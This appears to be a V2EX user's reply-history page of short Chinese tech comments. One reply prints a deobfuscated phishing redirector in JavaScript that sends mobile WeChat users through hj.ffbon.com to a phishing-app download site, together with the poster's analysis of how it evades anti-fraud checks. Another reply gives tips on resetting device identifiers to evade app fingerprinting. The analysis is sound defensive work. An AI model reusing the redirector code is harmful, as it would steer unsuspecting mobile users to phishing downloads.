V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  Maerd  ›  全部回复第 3 页 / 共 4 页
回复总数  76
1  2  3  4  
qtscrcpy 的 issue 里面看到你发的了
236 天前
回复了 mkoijnbhu 创建的主题 Android 询问 bilibili 存储位置问题
综上大概率是 oaid ,oaid 大部分是由移动联盟的闭源 sdk 生成的,小部分是通过一些开源的 sdk 生成,一般市面上的 xposed 隐私保护插件是没有修改 oaid 的功能的,oaid 的 hook 点也不好找,所以 op 之前 hook 安卓 id 、ssid 这些内容肯定是无效的
236 天前
回复了 mkoijnbhu 创建的主题 Android 询问 bilibili 存储位置问题
常年搞反检测,给你提供几个思路,我个人比较倾向于是 oaid 检测:
0.低可能性: ssaid 安卓设备标识符,刷 rom 后可重置; imei ,更换 sim 卡可重置;但是这俩在安卓 10 以上不给电话权限无法获取,可能性较小
1.中可能性: 国外手机,具有谷歌框架的 gaid (谷歌框架的广告识别 id )这个在 google 应用中可重置,字节系 app 在关闭了这个功能后依旧可以获取到 gaid ,不知道什么原理
2.高可能性: 国产手机含有移动安全联盟推出的 oaid ,精准地解决了 Android 10 以上设备无法获取标识符的问题。可以重置也可以关闭,miui 中一般被称作虚拟身份 id (可以直接在设置中搜索),oppo 系手机叫做设备标识。

哦对了,oaid 建议重置而不是关闭,因为一般国产的 app 会把 oaid 作为最高优先级的设备标识,关闭后 app 会另寻其他的设备标识
你和我当时犯的错误一样,就是把视频通过后端处理然后返回给前端,这个对服务的影响其实蛮大的。楼上的几个老哥也说复杂了,实际上视频无论是 mp4 还是 flv ,套一层 nginx ,把静态链接丢给前端就可以流式播放了,不需要手动处理。另外就是,视频这种的大静态文件最好不要直接丢在服务器上
这个不算麻烦,当年对接微信支付的时候简直想一刀捅死张小龙
252 天前
回复了 wizardyhnr 创建的主题 Python 摸脚店(Mojo)本地开业了
我觉得这语言最搞笑的是宣称比 python 快万倍。官网的 benchmark ,用了各种田忌赛马的操作,最后比 python 快了 4100 倍。但是我直接用 python+numpy 实现官网的用例,结果是快 20000 倍,那我为什么要用你呢?另外宣称的完全兼容 cpython 更是让我大跌眼镜,所谓的完全兼容居然是在 mojo 里面放了个 cpython 解释器,然后用 cpython 解释器运行 python 代码,那我在里面再放个 gcc/g++岂不是完美兼容 c/c++了
256 天前
回复了 IurNusRay 创建的主题 Python 有人在用 Pycharm + WSL2 吗
@XueXianqi 是不是觉得很离谱?你试一下 pycharm 的远程功能就知道了,pycharm 的远程功能就是这样设计的,服务端是一个不带界面的完整 ide

“JetBrains 远程开发将通过 SSH 连接到现有服务器。IDE 作为后端服务安装在远程机器上,将在其中加载项目而不显示用户界面。”
api 没有规定格式?
这个链接返回的是第一层加密 js ,逆向后按照下方代码请求后,会得到第二层加密 js ,最后跳转到钓鱼页面

![钓鱼 app]( https://img1.imgtp.com/2023/09/04/HuDxKzqv.jpg)

以下是反混淆内容

```javascript
// 注意:以下内容需要在移动端微信浏览器中打开,node 端无法测试
// 如需要在 pc 端浏览器测试,请将 ua 改为微信内置浏览器 ua
// 例:Mozilla/5.0 (Linux; Android 13; PHB110 Build/TP1A.220905.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/111.0.5563.116 Mobile Safari/537.36 XWEB/5235 MMWEBSDK/20230701 MMWEBID/8568 MicroMessenger/8.0.40.2420(0x28002837) WeChat/arm64 Weixin NetType/WIFI Language/zh_CN ABI/arm64

/**
* 获取指定 url 参数
*/
function getParam(queryStr = "", key = null) {
var pattern = new RegExp("(^|&)" + key + "=([^&]*)(&|$)", "i"),
groups = queryStr.substr(1).match(pattern);
// 有对应的 url 参数返回编码后的 url 参数,没有则返回空
return (groups != null) ? unescape(groups[2]) : ""
}

/**
* 环境检测,此处逻辑应当是为了防止在 pc 端打开,仅检测手机端,用于跳转钓鱼网站
*/
function envCheck(ciValue) {
// 如果没有 ci 参数,跳转到百度
var baiduUrl = "https://www.baidu.com"
if (!ciValue) {
location.replace();
return;
}
var platforms = { "win": false, "mac": false, "xll": false }
// 此处为环境检测,node 环境没有 navigator 对象,测试时可以将下属 8 行代码注释掉
var currentPlatform = navigator.platform;
platforms.win = currentPlatform.indexOf("Win") == 0;
platforms.mac = currentPlatform.indexOf("Mac") == 0;
platforms.x11 = currentPlatform == "X11" || currentPlatform.indexOf("Linux") == 0;
// 如果是 win 、mac 、x11 环境,跳转到百度
if (platforms.win || platforms.mac || platforms.xll) {
location.replace(baiduUrl);
return;
}
}

/**
* 发送钓鱼请求,此处用了 xhr 请求,node 无法请求,实际测试时请自行替换
*/
function main() {
// 此处原内容为 window.location.search ,为 node 环境测试方便,使用楼主提供的 url
// var queryStr = window.location.search;
var queryStr = "?ci=j63sohnl&s://www.qunar.com/kong/pbray?ex_track=auto_5a3b7302";
var ciValue = getParam(queryStr, "ci")
// envCheck(ciValue); // 在桌面端平台这行可以省略,因为会跳转到百度
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
xhr.readyState == 4 && xhr.status == 200 && window.location.replace(xhr.responseText);
};
xhr.open("POST", "https://hj.ffbon.com/blii.html", true);
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
// var _0x1d1a3b = window.localStorage.getItem("xxio" + ciValue);
// _0x1d1a3b == null ? (window.localStorage.setItem("xxio" + ciValue, "gsdfsds"), _0x1d1a3b = 0) : _0x1d1a3b = 1;
xhr.send("vi=" + ciValue + "&nu=" + 1);
}

//执行入口
main()
```
@justNoBody 他用的所有的域名都有备案,应该是电报上面黑产卖的那种
原代码会检测目标平台,如果是 pc 端则跳转百度,如果是移动端,则通过阿里云的白域名 ffbon.com 跳转两次,然后再跳转到到移动云,通过移动云跳转到钓鱼 app 下载网站,所有的内容都是动态生成,但是伪装成了静态页。我猜测这种方式应该是为了过微信和国家防火墙的反诈检测,搞得还挺麻烦🤔待我整理一下放出反混淆后的内容
@zhyl 你这手解的怎么和我用工具反混淆出来的一样呢,而且错的地方也一样,抓个包能很明显发现这个 url 并没有被请求到,对 mo.ffbon.com/zzzz 进行重写替换上述代码,也无法实现跳转效果,这种情况很明显是反混淆工具在环境检测的时候走向了错误的分支
@zhyl 哥们是直接用解混淆工具解的吧,这个解出来是错的
@mritd 纯纯 sb 行为,平台做的又丑,还又当又立
@ruoxie 用安卓自带的布局组件才叫真正的恶心
263 天前
回复了 LeeReamond 创建的主题 程序员 有没有什么前端验证码的成熟方案?
直接接入第三方验证吧,前端验证基本拦不住爬虫
@shuimugan 2 并发技术栈落后是指的啥?我不是搞 java 的,是指现在该讲虚拟线程吗?求赐教
263 天前
回复了 NoobNoob030 创建的主题 程序员 内网穿透被网警打电话了
@bitkuang8 那种场景也不是个人直接不打招呼就穿透吧
xpath 和正则是都要学的,bs 可以不学
再拿个手机对着拍
1  2  3  4  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3149 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 30ms · UTC 04:35 · PVG 12:35 · LAX 21:35 · JFK 00:35
Developed with CodeLauncher
♥ Do have faith in what you're doing.